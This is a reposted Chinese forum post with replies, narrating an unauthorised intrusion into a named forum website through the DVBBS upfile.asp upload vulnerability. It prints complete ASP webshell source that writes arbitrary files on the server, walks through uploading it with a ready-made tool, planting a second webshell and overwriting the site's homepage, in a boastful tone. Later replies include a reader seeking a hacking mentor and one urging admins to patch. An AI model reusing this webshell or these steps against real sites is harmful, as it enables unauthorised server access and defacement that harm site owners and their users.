[转载]动网论坛上传文件upfile.asp漏洞入侵实例
文章作者:pchoer文章备注:文章有图 但是不影响 而且原始连接也没有传图片
最近刚刚在闹“震荡波”的蠕虫,,没有想到,这么快又有新的漏洞玩了,,而且还是超级大牌型的,呵呵~~~真是幸福了我们这些黑友`:),为什么说动网的这个大呢??因为,网上有很多的网站都在用这个论坛,不过这个漏洞只对DVBBS7.0 SP2版本以下的存在,不过没有关系,DVBBS7.0 SP2才刚出,用的肯定也不多,呵呵``一但有漏洞的话,上传个asp木马上去,改改首页拉,下数据库拉,,都是小菜了,有办法的话还是要拿到服务器的权限才爽~西西```,,好了, 说了废话半天,天都快亮了。下面开始入侵吧,
拿出DvbbsUpFile.exe,这个东东的说明?:
本程序是根据动网upfile.asp文件所存在的漏洞而编写的.
原理是由用户可自定义上传路径,我们通过构造特殊的路径.
而实现直接上传ASP木马.
本程序要上传的ASP木马请放到与EXE文件相同目录下,请命名为
Newmm.asp,在界面中输入地址(HOST)与生成的文件名(Create FileName)
其它的基本上不用更改,点击Send Data按纽即可.
在最下面的文件框中,你会看到服务器相应的返回信息.
是否上传成功,你可以从返回信息中看到.
简单的说,就是它已经帮我们构造好所要发送的伪造的数据包了,我们所要做的只是填上所要攻击的论坛的域名,web的端口,upfile.asp文件的位置,和我们的asp木马在肉鸡上的名字就可以了!,,好的我们去搜索一个论坛来实验一下。找到了:[url]http://www.shuangge.com/bbs/index.asp[/url] 好的,填入论坛的域名,web的端口,upfile.asp文件的位置,和我们的asp木马在肉鸡上的名字,我基本都没有改变。如图:
提醒:Newmm.asp的大小最好小一点的,我这里用的是一个可以在服务器上生成.asp文件的asp木马,代码如下:
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "<font color=red>save Success!</font>" %>
<% else %>
<% response.write "<font color=red>Save UnSuccess!</font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "<form action= method=post>" %>
<% Response.write "保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>" %>
<% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>
<% Response.Write "<br>" %>
<% Response.write "本文件绝对路径" %>
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
<% Response.write "<br>" %>
<% Response.write "输入马的内容:" %>
<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
<% Response.write "<input type=submit value=保存>" %>
<% Response.write "</form>" %>
copy以后保存为Newmm.asp就可以了。
好了以后,我们点senddata。如果成功的话,大家会看到在最后有一句话:
<script>parent.document.forms[0].myface.value=uploadFace/ok.asp
2a
图片上传成功,请copy下边的图片连接,以备后用
西西~~~上传成功了,下面我们来打开:[url]http://www.shuangge.com/bbs/uploadFace/ok.asp[/url]
将会看到如下的画面:
。,接着,,我们把他的首页改了,西西```
先把海洋的asp木马建立在服务器上:输入服务器上我们的海洋asp木马的路径,再copy海洋asp木马的原代码,如图:
好了以后,点饥保存。会看到save Success!证明保存成功了。我们再来打开:[url]http://www.shuangge.com/bbs/uploadFace/hao.asp[/url]
嘿嘿`~`熟悉吧```我们的海洋asp木马就这么上去了。
先来看看对方的首页的位置,一般都是index.asp或是index.html的``,
再黑之前,先打开他的首页看看:
呵呵``做得还可以嘛````。找一下他的主页路径,OK了:入图:
那我们就自己做一和他的文件名一样的文件传上去覆盖就可以了。
大家可以看看我的结果截图~~哈哈``: 文章不错,但是我看不太明白。真是笨呀。 哎~!!
我希望在网络上能有一位好心的大哥哥可以带带我。
我的联系方式: QQ:133886880 MSN:[email]hackcq@hotmail.com[/email] E-MAIL:[email]hackcq@163.com[/email]
加我的时候注明: 陈少 顶......但我也不会吖.........伤心.................... 像我这个菜鸟,电脑知识都是自学来的,大脑里的东西也是东拼西凑,对一些概念模糊不清、一知半解,很希望能看到一些基础的,准确的,详细的技术资料! 虽然够老了~~~
但一个DV+servU的服务器,常常就这样被人拿下系统权限~~~
唉~~~
是这个漏洞的普遍性+servU溢出,创造了无数换人主页的“黑客”。
希望大家找到有漏洞的 DVBBS一定帮他打好补丁~~~
页:
[1]